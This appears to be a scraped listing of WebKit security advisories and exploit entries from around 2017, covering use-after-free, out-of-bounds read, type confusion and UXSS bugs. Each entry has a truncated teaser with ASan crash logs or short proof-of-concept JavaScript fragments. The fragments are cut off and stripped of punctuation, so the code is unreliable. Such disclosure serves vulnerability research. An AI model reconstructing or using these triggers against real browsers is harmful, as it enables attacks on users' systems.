WebKit: out-of-bounds read in WebCore::SimpleLineLayout::RunResolver::runForPoint(CVE-2017-13784)

There is an out-of-bounds read security vulnerability in WebKit. The vulnerability was confirmed on ASan build of WebKit nightly. ASan log: ================================================================= ==30436==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x606000560c48 at pc...

WebKit: use-after-free in WebCore::FormSubmission::create(CVE-2017-13791)

There is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on ASan build of WebKit nightly. ASan log: ================================================================= ==934==ERROR: AddressSanitizer: heap-use-after-free on address 0x60c0000b9810 at pc 0x000114b6f4...

WebKit - WebCore::InputType::element Use-After-Free Exploit

Exploit for multiple platform in category dos / poc / Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1345 There is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on ASan build of WebKit nightly. PoC:...

Apple WebKit: UXSS via PrototypeMap::createEmptyStructure

When creating an object in Javascript, its |Structure| is created with the constructor's prototype's |VM|. Here's some snippets of that routine. Structure InternalFunction::createSubclassStructureExecState exec, JSValue newTarget, Structure baseClass ... if newTarget && newTarget != exec-jsCallee...

Apple WebKit 10.0.2(12602.3.12.0.1, r210800) - constructJSReadableStreamDefaultReader Type Confusion

Exploit for multiple platform in category web applications exec.argument0; if !stream return throwArgumentTypeErrorexec, scope, 0, "stream", "ReadableStreamReader", nullptr, "ReadableStream"; JSValue jsFunction = stream-get&exec, Identifier::fromString&exec, "getReader"; let rs = new...

Apple WebKit - 'ComposedTreeIterator::traverseNextInShadowTree' Use-After-Free

function go d.open = false; d.innerHTML = "foo"; d.open = true; foo !-- ================================================================= ASan log: ================================================================= ==570==ERROR: AddressSanitizer: heap-use-after-free on address 0x607000065058 at pc...

Apple WebKit 10.0.2 - HTMLInputElement Use-After-Free

function eventhandler1 input.type = "foo"; function eventhandler2 input.selectionStart = 25; !-- ================================================================= ASAN log from WebKit nightly on Mac: ================================================================= ==26782==ERROR: AddressSanitize...

Apple WebKit - 'FormSubmission::create' Use-After-Free

function go object.name = "foo"; input.autofocus = true; output.appendChildinput; form.submit; function eventhandler forvar i=0;i a !-- ================================================================= Preliminary analysis: The bug is in FormSubmission::create. This function traverses the vector ...